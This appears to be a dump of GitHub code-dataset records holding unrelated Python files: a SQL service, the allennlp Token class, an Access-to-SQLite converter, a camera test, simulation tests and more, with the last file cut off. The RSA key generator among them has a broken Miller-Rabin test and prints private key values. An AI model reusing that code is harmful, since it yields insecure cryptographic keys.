'{}.jpg'.format(fn))))\n\nf_train.close()\nf_test.close()\n","repo_name":"minhnhat93/darkflow-finetune-IDOT_dataset","sub_path":"idot_scripts/create_idot_labels_for_darknet.py","file_name":"create_idot_labels_for_darknet.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36649890904","text":"# Modulos de python\r\nimport pyodbc\r\nfrom app.controller.connectionString import return_conection_string\r\n# Operaciones SQL con categorias\r\nclass sCategorias: \r\n # constructor\r\n def __init__(self,nombre_Categoria=None,id_Categoria_Padre=None):\r\n self.__nombre_Categoria = None\r\n self.__id_Categoria_padre = None\r\n self.__constring = return_conection_string(argument='mssql', db_database='stupid_category')\r\n #self.__constring = connectionString().connectionODBC() # Conexion a la base de datos.\r\n pass\r\n\r\n # Trae todas las categorias del productos \r\n def SP_GET_CATEGORIES (self):\r\n conexion = pyodbc.connect(self.__constring,autocommit=True,timeout=10) # Le digo que cierre automaticamente la conexion\r\n cursor = conexion.cursor()\r\n resultado = None\r\n with conexion:\r\n sentencia = \"EXEC SP_GET_CATEGORIES\"\r\n cursor.execute(sentencia)\r\n resultado = cursor.fetchall()\r\n # Se recorre los resultados y se guardan el un array\r\n array = [] # El array de retorno \r\n json = { }\r\n for row in resultado:\r\n \r\n json['id_Categoria'] = row.Categoria_id\r\n json['nombre_Categoria'] = row.nombre_Categoria\r\n json['level'] = row.level\r\n json['imagen'] = row.imagen\r\n array.append(json)\r\n json = {} \r\n return array\r\n ","repo_name":"jose55mase/servise_kiero_broco","sub_path":"app/services/scategorias.py","file_name":"scategorias.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"44871308382","text":"# Важная информация! По ссылке объяснение как .py файлы компилировать в .exe\n# http://nikovit.ru/blog/samyy-prostoy-sposob-skompilirovat-python-fayl-v-exe/\n\nimport ProbabilityTest\nimport DivisionTest\n\n\n# main\ndef main():\n print('\\n')\n print(\"Начало выполнения программы\")\n while True:\n test_method = int(input(\"Введите название теста: \"))\n if test_method == 1:\n print(\"\\t\\v Тест Ферма\")\n test = ProbabilityTest.TestForNumbers()\n num = test.set_number()\n test.Ferma_test(num)\n elif test_method == 2:\n print(\"\\t\\v Тест Рабина-Миллера'\")\n test = ProbabilityTest.TestForNumbers()\n num = test.set_number()\n test_num = int(input('Введите число проверок : '))\n test.RabinMiller_test(num, test_num)\n elif test_method == 3:\n print(\"\\t\\v Тест на простоту числа\")\n DivisionTest.DivisionTest.division()\n else:\n break\n\n\n# end main\nif __name__ == '__main__':\n main()\n","repo_name":"SofiFairyTell/lw_2021","sub_path":"IB/lw_4/cypher_test.py","file_name":"cypher_test.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3012796671","text":"from dataclasses import dataclass\nfrom typing import Optional\n\n\n@dataclass(init=False, repr=False)\nclass Token:\n \"\"\"\n A simple token representation, keeping track of the token's text, offset in the passage it was\n taken from, POS tag, dependency relation, and similar information. These fields match spacy's\n exactly, so we can just use a spacy token for this.\n\n # Parameters\n\n text : `str`, optional\n The original text represented by this token.\n idx : `int`, optional\n The character offset of this token into the tokenized passage.\n idx_end : `int`, optional\n The character offset one past the last character in the tokenized passage.\n lemma_ : `str`, optional\n The lemma of this token.\n pos_ : `str`, optional\n The coarse-grained part of speech of this token.\n tag_ : `str`, optional\n The fine-grained part of speech of this token.\n dep_ : `str`, optional\n The dependency relation for this token.\n ent_type_ : `str`, optional\n The entity type (i.e., the NER tag) for this token.\n text_id : `int`, optional\n If your tokenizer returns integers instead of strings (e.g., because you're doing byte\n encoding, or some hash-based embedding), set this with the integer. If this is set, we\n will bypass the vocabulary when indexing this token, regardless of whether `text` is also\n set. You can `also` set `text` with the original text, if you want, so that you can\n still use a character-level representation in addition to a hash-based word embedding.\n type_id : `int`, optional\n Token type id used by some pretrained language models like original BERT\n\n The other fields on `Token` follow the fields on spacy's `Token` object; this is one we\n added, similar to spacy's `lex_id`.\n \"\"\"\n\n __slots__ = [\n \"text\",\n \"idx\",\n \"idx_end\",\n \"lemma_\",\n \"pos_\",\n \"tag_\",\n \"dep_\",\n \"ent_type_\",\n \"text_id\",\n \"type_id\",\n ]\n # Defining the `__slots__` of this class is an optimization that dramatically reduces\n # the size in memory of a `Token` instance. The downside of using `__slots__`\n # with a dataclass is that you can't assign default values at the class level,\n # which is why we need a custom `__init__` function that provides the default values.\n\n text: Optional[str]\n idx: Optional[int]\n idx_end: Optional[int]\n lemma_: Optional[str]\n pos_: Optional[str]\n tag_: Optional[str]\n dep_: Optional[str]\n ent_type_: Optional[str]\n text_id: Optional[int]\n type_id: Optional[int]\n\n def __init__(\n self,\n text: str = None,\n idx: int = None,\n idx_end: int = None,\n lemma_: str = None,\n pos_: str = None,\n tag_: str = None,\n dep_: str = None,\n ent_type_: str = None,\n text_id: int = None,\n type_id: int = None,\n ) -> None:\n assert text is None or isinstance(\n text, str\n ) # Some very hard to debug errors happen when this is not true.\n self.text = text\n self.idx = idx\n self.idx_end = idx_end\n self.lemma_ = lemma_\n self.pos_ = pos_\n self.tag_ = tag_\n self.dep_ = dep_\n self.ent_type_ = ent_type_\n self.text_id = text_id\n self.type_id = type_id\n\n def __str__(self):\n return self.text\n\n def __repr__(self):\n return self.__str__()\n\n def ensure_text(self) -> str:\n \"\"\"\n Return the `text` field, raising an exception if it's `None`.\n \"\"\"\n if self.text is None:\n raise ValueError(\"Unexpected null text for token\")\n else:\n return self.text\n\n\ndef show_token(token: Token) -> str:\n return (\n f\"{token.text} \"\n f\"(idx: {token.idx}) \"\n f\"(idx_end: {token.idx_end}) \"\n f\"(lemma: {token.lemma_}) \"\n f\"(pos: {token.pos_}) \"\n f\"(tag: {token.tag_}) \"\n f\"(dep: {token.dep_}) \"\n f\"(ent_type: {token.ent_type_}) \"\n f\"(text_id: {token.text_id}) \"\n f\"(type_id: {token.type_id}) \"\n )\n","repo_name":"allenai/allennlp","sub_path":"allennlp/data/tokenizers/token_class.py","file_name":"token_class.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":11609,"dataset":"github-code","pt":"78"} +{"seq_id":"25704466447","text":"import pandas_access as mdb\nfrom sqlalchemy import create_engine\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\naccess_files = [f for f in listdir(\"./data\") if isfile(join(\"./data\", f)) and os.path.splitext(f)[1] in ['.mdb', '.accdb]']]\n\nencoding_list = ['ascii', 'big5', 'big5hkscs', 'cp037', 'cp273', 'cp424', 'cp437', 'cp500', 'cp720', 'cp737'\n , 'cp775', 'cp850', 'cp852', 'cp855', 'cp856', 'cp857', 'cp858', 'cp860', 'cp861', 'cp862'\n , 'cp863', 'cp864', 'cp865', 'cp866', 'cp869', 'cp874', 'cp875', 'cp932', 'cp949', 'cp950'\n , 'cp1006', 'cp1026', 'cp1125', 'cp1140', 'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254'\n , 'cp1255', 'cp1256', 'cp1257', 'cp1258', 'euc_jp', 'euc_jis_2004', 'euc_jisx0213', 'euc_kr'\n , 'gb2312', 'gbk', 'gb18030', 'hz', 'iso2022_jp', 'iso2022_jp_1', 'iso2022_jp_2'\n , 'iso2022_jp_2004', 'iso2022_jp_3', 'iso2022_jp_ext', 'iso2022_kr', 'latin_1', 'iso8859_2'\n , 'iso8859_3', 'iso8859_4', 'iso8859_5', 'iso8859_6', 'iso8859_7', 'iso8859_8', 'iso8859_9'\n , 'iso8859_10', 'iso8859_11', 'iso8859_13', 'iso8859_14', 'iso8859_15', 'iso8859_16', 'johab'\n , 'koi8_r', 'koi8_t', 'koi8_u', 'kz1048', 'mac_cyrillic', 'mac_greek', 'mac_iceland', 'mac_latin2'\n , 'mac_roman', 'mac_turkish', 'ptcp154', 'shift_jis', 'shift_jis_2004', 'shift_jisx0213', 'utf_32'\n , 'utf_32_be', 'utf_32_le', 'utf_16', 'utf_16_be', 'utf_16_le', 'utf_7', 'utf_8', 'utf_8_sig']\n\nfor access_file in access_files:\n sqlite_file = join(\"./data\", os.path.splitext(access_file)[0]+'.sqlite')\n\n if os.path.isfile(sqlite_file):\n print(f\"file {sqlite_file} already exist!!! discarded\")\n continue\n\n engine = create_engine('sqlite:///{0}'.format(join(\"./data\", os.path.splitext(access_file)[0]+'.sqlite')), echo=False)\n tlist = [tbl for tbl in mdb.list_tables(join(\"./data\", access_file))]\n tables = {}\n\n for tbl in tlist:\n ok = False\n for encoding in encoding_list:\n try:\n table = mdb.read_table(join(\"./data\", access_file), tbl, encoding=encoding)\n tables[tbl] = table\n except:\n # print(f\"table {tbl} of database {access_file} discarded. could not be read ..\")\n continue\n print (f\"Good encoding for table {tbl}-{access_file} is {encoding}\")\n ok = True\n break\n\n if not ok:\n print(f\"table {tbl} of database {access_file} Could not be read ..\")\n\n\n for tab in tables:\n print(f\"table {tab} of DB {access_file} imported into DB {sqlite_file}\")\n tables[tab].to_sql(tab, con=engine)\n\n print(f\"file {sqlite_file} created\")\n","repo_name":"serioca/access2sqlite","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39138108556","text":"import time\nimport picamera\nimport picamera.array\nimport numpy as np\nimport scipy \nimport scipy.misc\n\nimgArr=np.zeros((60, 3, 64, 64), dtype=np.uint8)\nwith picamera.PiCamera() as camera:\n with picamera.array.PiRGBArray(camera) as output:\n camera.resolution=(640, 480)\n \n for i, filename in enumerate(camera.capture_continuous(output, 'rgb', burst=True)) :\n #camera.capture(output, 'rgb')\n print('Captured %dx%d image' % (output.array.shape[1], output.array.shape[0]))\n img=output.array[:, 80:-80]\n output.truncate(0)\n img=scipy.misc.imresize(img, (64, 64), 'cubic', 'RGB').transpose(2, 0, 1)\n #print('%d %d %d' %(img.shape[0], img.shape[1], img.shape[2]))\n imgArr[i]=np.array(img, dtype=np.uint8)\n time.sleep(.01)\n if i==59: \n break\n np.savez('testfile', imgArr)\n","repo_name":"dvbuntu/autonomous","sub_path":"attic/picameratest2.py","file_name":"picameratest2.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"78"} +{"seq_id":"38198905949","text":"from datetime import datetime\r\nimport copy\r\nimport xlwt\r\nimport vcg\r\nimport pickle\r\n\r\n# 需要持久化数据的数量\r\ndata_num = 1000\r\n# 生成测试集还是训练集\r\n# 1为train训练集,0为test测试集\r\ntrain_flag = 0\r\n\r\n# 一组拍卖内部是否需要排序\r\nsort_flag = True\r\n\r\ndef loadDataFromFile(excel_path, x, y):\r\n print(\"load from file {0}\".format(excel_path))\r\n mydb = open(excel_path, 'rb')\r\n x_tmp = pickle.load(mydb)\r\n y_tmp = pickle.load(mydb)\r\n for ii in x_tmp:\r\n x.append(ii)\r\n for ii in y_tmp:\r\n y.append(ii)\r\n mydb.close()\r\n return len(x)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n file = xlwt.Workbook(encoding='utf-8')\r\n # 指定file以utf-8的格式打开\r\n sheet1 = file.add_sheet('vcg',cell_overwrite_ok=True)\r\n\r\n # 数据的配置\r\n config_data_name = [\"物品数\", \"买家数\", \"总拍卖数\"]\r\n config_data = [2, 9, data_num]\r\n for i in range(0, len(config_data)):\r\n sheet1.write(i, 0, config_data_name[i])\r\n sheet1.write(i, 1, config_data[i])\r\n\r\n # 生成模拟数据\r\n y = []\r\n x = []\r\n\r\n m = vcg.generateData(config_data[2], x, y, 0, sort_flag)\r\n\r\n # 指定标题\r\n head = ['序号']\r\n # 生成标题\r\n # 用户\r\n for i in range(config_data[1]):\r\n # 物品\r\n jj = 1< dict:\n \"\"\"Returns an object containing the subject and text and HTML versions of an email with the given template name\"\"\"\n if template_name == EmailTemplates.installer__welcomeEmail:\n return {\n 'subject': installer_welcome_email.subject,\n 'html': apply_params(installer_welcome_email.html, params, html=True),\n 'text': apply_params(installer_welcome_email.text, params)\n }\n","repo_name":"yashkumarsingh995/api_testing","sub_path":"mail/src/core/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13369261759","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nimport numpy as np\n\n# univariate analysis to calc MSE (https://www.youtube.com/watch?v=uD1Dfz0aqkA_)\n# given values (i.e. marks scored by student) = total 70, mean 14\nY_true = [19,17,9,13,12] # = Y (original values)\n\n#calculated values\nY_pred = 14 # same as Y [14,14,14,14,14]\n\n# MSE (subtract each value from 14, sqaure them and add them)\nMSE = np.square(np.subtract(Y_true,Y_pred)).mean()\n\nprint (MSE)\n\n\n# In[5]:\n\n\n# we can do all above with formula using sklearn\nfrom sklearn.metrics import mean_squared_error\n# given values\nY_true = [19,17,9,13,12] \n# calculated values\n# can't use Y_pred = 14 , have to full list in sklearn\nY_pred = [14,14,14,14,14]\n\n#calc of MSE\nMSE = mean_squared_error (Y_true, Y_pred)\nprint (MSE)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kealankelly/sharing-github","sub_path":"Understanding Mean squared error.py","file_name":"Understanding Mean squared error.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31904717461","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom standard_program import run_standard_program\nimport timeit\n\nsns.set(font_scale=2.0)\n\ndef wrapper(func, hypercolumns, minicolumns, epochs):\n def wrapped():\n return func(hypercolumns, minicolumns, epochs)\n return wrapped\n\nminicolumns_benchmark = True\nhypercolumns_benchmark = True\nepochs_benchmark = True\n\nif minicolumns_benchmark:\n # Minicolumns\n hypercolumns = 4\n minicolumns_range = np.arange(10, 100, 5)\n epochs = 1\n\n times_minicolumns = []\n for minicolumns in minicolumns_range:\n function = wrapper(run_standard_program, hypercolumns, minicolumns, epochs)\n time = timeit.timeit(function, number=1)\n times_minicolumns.append(time)\n\n # Plot\n fig = plt.figure(figsize=(16, 12))\n ax = fig.add_subplot(111)\n ax.plot(minicolumns_range, times_minicolumns, '*-', markersize=4)\n ax.set_xlabel('Minicolumns')\n ax.set_ylabel('Seconds that the program runed')\n\n# Hypercolumns\nif hypercolumns_benchmark:\n hypercolumns_range = np.arange(4, 20, 2)\n minicolumns = 20\n epochs = 1\n\n times_hypercolumns = []\n for hypercolumns in hypercolumns_range:\n function = wrapper(run_standard_program, hypercolumns, minicolumns, epochs)\n time = timeit.timeit(function, number=1)\n times_hypercolumns.append(time)\n\n # Plot\n sns.set(font_scale=2.0)\n fig = plt.figure(figsize=(16, 12))\n ax = fig.add_subplot(111)\n ax.plot(hypercolumns_range, times_hypercolumns, '*-', markersize=4)\n ax.set_xlabel('Hypercolumns')\n ax.set_ylabel('Seconds that the program runed')\n\n# Epochs\nif epochs_benchmark:\n hypercolumns = 4\n minicolumns = 20\n epochs_range = np.arange(1, 10, 1)\n\n times_epochs = []\n for epochs in epochs_range:\n function = wrapper(run_standard_program, hypercolumns, minicolumns, epochs)\n time = timeit.timeit(function, number=1)\n times_epochs.append(time)\n\n # Plot\n sns.set(font_scale=2.0)\n fig = plt.figure(figsize=(16, 12))\n ax = fig.add_subplot(111)\n ax.plot(epochs_range, times_epochs, '*-', markersize=4)\n ax.set_xlabel('Epochs')\n ax.set_ylabel('Seconds that the program runed')\n\nif minicolumns_benchmark and hypercolumns_benchmark and epochs_benchmark:\n fig = plt.figure(figsize=(16, 12))\n ax1 = fig.add_subplot(131)\n ax2 = fig.add_subplot(132)\n ax3 = fig.add_subplot(133)\n\n ax1.plot(minicolumns_range, times_minicolumns, '*-', markersize=4)\n ax2.plot(hypercolumns_range, times_hypercolumns, '*-', markersize=4)\n ax3.plot(epochs_range, times_epochs, '*-', markersize=4)\n\n ax1.set_title('Minicolumn scaling')\n ax2.set_title('Hypercolumn scaling')\n ax3.set_title('Epoch scaling')\n\n ax1.set_ylabel('Time ')\n\nif minicolumns_benchmark or hypercolumns_benchmark or epochs_benchmark:\n plt.show()","repo_name":"h-mayorquin/attractor_sequences","sub_path":"benchmarking/standard_program_times.py","file_name":"standard_program_times.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"34341343672","text":"import argparse\nimport os\nimport math\nfrom collections import namedtuple\nfrom tqdm import tqdm\nfrom array import array\n\nfrom .utils import *\nfrom ..utils import *\n\n\ndef make_clickWeekday_clickHour():\n global config\n clickTimes = load_feature(os.path.join(config['features_dir'], 'raw', 'clickTime.npy'))\n clickWeekday = np.empty(len(clickTimes), dtype=np.int32)\n clickHour = np.empty(len(clickTimes), dtype=np.int32)\n for i, clickTime in enumerate(clickTimes):\n dd, hh, mm = clickTime / 10000, clickTime / 100 % 100, clickTime % 100\n clickWeekday[i] = dd % 7\n clickHour[i] = hh\n meta = {'type': 'numeric', 'dimension': 1}\n dump_meta(os.path.join(config['features_dir'], 'extend', 'clickWeekday.meta.json'), meta)\n dump_feature(os.path.join(config['features_dir'], 'extend', 'clickWeekday.pkl'), clickWeekday)\n dump_meta(os.path.join(config['features_dir'], 'extend', 'clickHour.meta.json'), meta)\n dump_feature(os.path.join(config['features_dir'], 'extend', 'clickHour.pkl'), clickHour)\n\n\ndef main():\n global config\n config = read_global_config()\n actions = [\n make_clickWeekday_clickHour,\n ]\n\n actions = {f.__name__: f for f in actions}\n parser = argparse.ArgumentParser()\n parser.add_argument('action', choices=list(actions.keys()))\n args = parser.parse_args()\n actions[args.action]()\n print('done')\n\n\nmain()\n","repo_name":"abcdabcd987/tencent-ads-pcvr-contest","sub_path":"src/data/make_feature.py","file_name":"make_feature.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"14737366040","text":"#!/bin/python3\n\nimport string\nimport numpy as np\n\nsamples=['Here is your last hope.','But I am not sure if it will work.']\ncharacters=string.printable\ntoken_index=dict(zip(range(1,len(characters)+1),characters))\nmax_length=50\nresults=np.zeros((len(samples),max_length,max(token_index.keys())+1))\n\nfor i,sample in enumerate(samples):\n\tfor j,character in enumerate(sample):\n\t\tindex=token_index.get(character)\n\t\tresults[i,j,index]=1.\n\n\n","repo_name":"gavin4396/python-for-tensorflow","sub_path":"one_hot_string.py","file_name":"one_hot_string.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"78"} +{"seq_id":"40057335496","text":"#!/usr/bin/python\n\n# @Authors:\n# Yosbi Antonio Alves Saenz (yosbito@gmail.com)\n\nimport random\nfrom random import randint\nimport math\nimport sys\n\n\ndef rabinMiller(n):\n s = n - 1\n t = 0\n while s and 1 == 0:\n s = s / 2\n t += 1\n k = 0\n while k < 128:\n a = random.randrange(2, n - 1)\n v = pow(a, s, n) # (num,exp,mod)\n if v != 1:\n i = 0\n while v != (n - 1):\n if i == t - 1:\n return False\n else:\n i = i + 1\n v = (v ** 2) % n\n k += 2\n return True\n\n\ndef isPrime(n):\n # testing only with rabinMiller\n return rabinMiller(n)\n\n\ndef getPrime(l):\n n = random.getrandbits(l)\n if (n % 2 == 0):\n n = n + 1\n while (not (isPrime(n))):\n n = n + 2\n return n\n\n\n## 1 < e < phi(n) and gcd(e, phi(n)) = 1\ndef gete(phiDeN):\n e = 0\n if (phiDeN < 100000):\n e = randint(2, phiDeN // 2)\n else:\n e = randint(2, 100000)\n while True:\n if gcd(e, phiDeN) == 1:\n break\n else:\n e += 1\n return e\n\n\n# Greatest common divisor\ndef gcd(a, b):\n while b:\n a, b = b, a % b\n return a\n\n\n# using extended euclidean algorithm\n# d = e^(-1) (mod phi(n))\ndef getd(a, m):\n g, x, y = egcd(a, m)\n if g != 1:\n return None\n else:\n return x % m\n\n\n# Extended greatest common divisor (for extended euclidean algorithm)\ndef egcd(a, b):\n if a == 0:\n return (b, 0, 1)\n else:\n g, y, x = egcd(b % a, a)\n return (g, x - (b // a) * y, y)\n\n\ndef genRSAkey(L):\n l = (L // 2)\n\n p = getPrime(l)\n if debug:\n print(\"p generated:\")\n print(p)\n\n q = getPrime(l)\n if debug:\n print(\"q generated:\")\n print(q)\n\n n = p * q\n if debug:\n print(\"n generated\")\n print(n)\n\n phiDeN = (p - 1) * (q - 1)\n if debug:\n print(\"phi of n\")\n print(phiDeN)\n\n e = gete(phiDeN)\n if debug:\n print(\"e generated:\")\n print(e)\n\n d = d = getd(e, phiDeN)\n if debug:\n print(\"d generated:\")\n print(d)\n\n return (n, p, q, e, d)\n\n # test\n # m = 32\n\n # c = (m**e) % n\n # print \"el criptograma:\"\n # print c\n\n # md = (c**d) % n\n # print \"desencriptado:\"\n # print md\n\n\n# We can have the size of L either by args or by prompting the user\nL = 0\ndebug = True;\nif (len(sys.argv) == 2):\n L = int(sys.argv[1])\nelse:\n L = int(raw_input(\"Input the size of l \"))\n\ntuplo = genRSAkey(L)\n\nprint(\"result:\")\nprint(tuplo)\n","repo_name":"Yosbi/RSAKey-Generator","sub_path":"genRSAkey.py","file_name":"genRSAkey.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29935656351","text":"from pymongo import MongoClient\nimport logging\nimport urllib\n\nfrom conf import config\n\nlogger = logging.getLogger('TweetCollector')\n\nclient = MongoClient(config.mongo_host, config.mongo_port)\ndb = client.pasta\ncollection = db.tweets\n\nclass Tweet:\n def __init__(self, _id, created_ts, content, user, sentiment='pos'):\n self.id = _id\n self.created_ts = created_ts\n self.content = content\n self.sentiment = sentiment\n self.user = user\n self.url = urllib.quote('https://twitter.com/' + user + '/status/' + _id)\n self.count = 0\n\n \n def dump(self):\n logger.info('%s|%d|%s|%s' % (self.id, self.created_ts, self.content, self.sentiment))\n\n\n def save(self):\n sentiment = collection.find_one({\"id\": self.id}, {\"sentiment\": 1})\n #print sentimental\n if sentiment is None:\n self.count = self.count + 1;\n if self.count % 100 == 0: logger.info('Saved %d tweets.', self.count)\n self.dump()\n collection.insert(self.__dict__)","repo_name":"happyslowly/pasta","sub_path":"collector/Tweet.py","file_name":"Tweet.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34175386805","text":"from __future__ import division\nfrom __future__ import absolute_import\nfrom builtins import zip\nfrom builtins import range\nfrom past.utils import old_div\nfrom builtins import object\nimport pytest\nfrom numpy.testing import assert_array_almost_equal\nfrom .test_helpers import u\n\nimport openpathsampling as paths\nimport openpathsampling.engines as peng\nimport numpy as np\n\n\ntry:\n import openmmtools as omt\nexcept ImportError:\n omt = None\n\nimport openpathsampling.engines.openmm as omm_engine\n\nfrom openpathsampling.snapshot_modifier import *\n\nfrom collections import Counter\n\nimport logging\nlogging.getLogger('openpathsampling.initialization').setLevel(logging.CRITICAL)\nlogging.getLogger('openpathsampling.storage').setLevel(logging.CRITICAL)\nlogging.getLogger('openpathsampling.netcdfplus').setLevel(logging.CRITICAL)\n\n\nclass TestSnapshotModifier(object):\n def setup_method(self):\n # TODO OPS 2.0: This subclass is only here for python 2.7 should be\n # replaced with SnapshotModifier\n class DummyMod(SnapshotModifier):\n def __call__(self, a):\n return a\n self.Modifier = DummyMod\n self.modifier = DummyMod()\n self.snapshot_1D = peng.toy.Snapshot(\n coordinates=np.array([0.0, 1.0, 2.0, 3.0]),\n velocities=np.array([0.5, 1.5, 2.5, 3.5])\n )\n if paths.integration_tools.HAS_OPENMM:\n Class3D = peng.openmm.MDSnapshot\n else:\n Class3D = peng.toy.ToySnapshot\n self.snapshot_3D = Class3D(\n coordinates=np.array([[0.0, 0.1, 0.2],\n [1.0, 1.1, 1.2],\n [2.0, 2.1, 2.2],\n [3.0, 3.1, 3.2]]),\n velocities=np.array([[0.5, 0.6, 0.7],\n [1.5, 1.6, 1.7],\n [2.5, 2.6, 2.7],\n [3.5, 3.6, 3.7]])\n )\n\n def test_extract_subset(self):\n mod = self.Modifier(subset_mask=[1, 2])\n sub_1Dx = mod.extract_subset(self.snapshot_1D.coordinates)\n assert_array_almost_equal(sub_1Dx, np.array([1.0, 2.0]))\n sub_1Dv = mod.extract_subset(self.snapshot_1D.velocities)\n assert_array_almost_equal(sub_1Dv, np.array([1.5, 2.5]))\n\n sub_3Dx = mod.extract_subset(self.snapshot_3D.coordinates)\n assert_array_almost_equal(sub_3Dx, np.array([[1.0, 1.1, 1.2],\n [2.0, 2.1, 2.2]]))\n sub_3Dv = mod.extract_subset(self.snapshot_3D.velocities)\n assert_array_almost_equal(sub_3Dv, np.array([[1.5, 1.6, 1.7],\n [2.5, 2.6, 2.7]]))\n\n def test_apply_to_subset(self):\n mod = self.Modifier(subset_mask=[1, 2])\n copy_1Dx = self.snapshot_1D.coordinates.copy()\n new_1Dx = mod.apply_to_subset(copy_1Dx, np.array([-1.0, -2.0]))\n assert_array_almost_equal(new_1Dx, np.array([0.0, -1.0, -2.0, 3.0]))\n # and check that memory points to the right things; orig unchanged\n assert copy_1Dx is new_1Dx\n assert_array_almost_equal(self.snapshot_1D.coordinates,\n np.array([0.0, 1.0, 2.0, 3.0]))\n\n copy_3Dx = self.snapshot_3D.coordinates.copy()\n new_3Dx = mod.apply_to_subset(copy_3Dx,\n np.array([[-1.0, -1.1, -1.2],\n [-2.0, -2.1, -2.2]]))\n assert_array_almost_equal(new_3Dx, np.array([[0.0, 0.1, 0.2],\n [-1.0, -1.1, -1.2],\n [-2.0, -2.1, -2.2],\n [3.0, 3.1, 3.2]]))\n # and check that memory points to the right things; orig unchanged\n assert copy_3Dx is new_3Dx\n assert_array_almost_equal(self.snapshot_3D.coordinates,\n np.array([[0.0, 0.1, 0.2],\n [1.0, 1.1, 1.2],\n [2.0, 2.1, 2.2],\n [3.0, 3.1, 3.2]]))\n\n\nclass TestNoModification(TestSnapshotModifier):\n def setup_method(self):\n super(TestNoModification, self).setup_method()\n self.modifier = NoModification()\n\n def test_call(self):\n new_1D = self.modifier(self.snapshot_1D)\n assert_array_almost_equal(self.snapshot_1D.coordinates,\n new_1D.coordinates)\n assert_array_almost_equal(self.snapshot_1D.velocities,\n new_1D.velocities)\n new_3D = self.modifier(self.snapshot_3D)\n assert_array_almost_equal(self.snapshot_3D.coordinates,\n new_3D.coordinates)\n assert_array_almost_equal(self.snapshot_3D.velocities,\n new_3D.velocities)\n assert self.snapshot_1D.coordinates is not new_1D.coordinates\n assert self.snapshot_1D.velocities is not new_1D.velocities\n assert self.snapshot_3D.coordinates is not new_3D.coordinates\n assert self.snapshot_3D.velocities is not new_3D.velocities\n\n def test_call_no_copy(self):\n mod = NoModification(as_copy=False)\n new_1D = mod(self.snapshot_1D)\n assert new_1D is self.snapshot_1D\n new_3D = mod(self.snapshot_3D)\n assert new_3D is self.snapshot_3D\n\n def test_probability_ratio(self):\n # This should always return 1.0 even for invalid input\n assert self.modifier.probability_ratio(None, None) == 1.0\n\n\nclass TestRandomizeVelocities(object):\n def setup_method(self):\n # TODO: check against several possibilities, including various\n # combinations of shapes of velocities and masses.\n topology_2x3D = paths.engines.toy.Topology(\n n_spatial=3, n_atoms=2, masses=np.array([2.0, 3.0]), pes=None\n )\n topology_3x1D = paths.engines.toy.Topology(\n n_spatial=1, n_atoms=3, masses=np.array([[2.0], [3.0], [4.0]]),\n pes=None\n )\n topology_1x2D = paths.engines.toy.Topology(\n n_spatial=2, n_atoms=1, masses=np.array([1.0, 2.0]), pes=None\n )\n self.snap_2x3D = paths.engines.toy.Snapshot(\n coordinates=np.array([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]),\n velocities=np.array([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]),\n engine=paths.engines.toy.Engine({}, topology_2x3D)\n )\n self.snap_3x1D = paths.engines.toy.Snapshot(\n coordinates=np.array([[0.0], [0.0], [0.0]]),\n velocities=np.array([[0.0], [0.0], [0.0]]),\n engine=paths.engines.toy.Engine({}, topology_3x1D)\n )\n self.snap_1x2D = paths.engines.toy.Snapshot(\n coordinates=np.array([[0.0, 0.0]]),\n velocities=np.array([[0.0, 0.0]]),\n engine=paths.engines.toy.Engine({}, topology_1x2D)\n )\n\n def test_call(self):\n # NOTE: these tests basically check the API. Tests for correctness\n # are in `test_snapshot_modifier.ipynb`, because they are inherently\n # stochastic.\n randomizer = RandomVelocities(beta=old_div(1.0, 5.0))\n new_1x2D = randomizer(self.snap_1x2D)\n assert new_1x2D.coordinates.shape == new_1x2D.velocities.shape\n assert (pytest.approx(new_1x2D.coordinates) ==\n self.snap_1x2D.coordinates)\n assert new_1x2D is not self.snap_1x2D\n assert new_1x2D.coordinates is not self.snap_1x2D.coordinates\n assert new_1x2D.velocities is not self.snap_1x2D.velocities\n for val in new_1x2D.velocities.flatten():\n assert val != 0.0\n assert randomizer.probability_ratio(self.snap_1x2D, new_1x2D) == 1.0\n\n new_2x3D = randomizer(self.snap_2x3D)\n assert new_2x3D.coordinates.shape == new_2x3D.velocities.shape\n assert_array_almost_equal(new_2x3D.coordinates,\n self.snap_2x3D.coordinates)\n assert new_2x3D is not self.snap_2x3D\n assert new_2x3D.coordinates is not self.snap_2x3D.coordinates\n assert new_2x3D.velocities is not self.snap_2x3D.velocities\n for val in 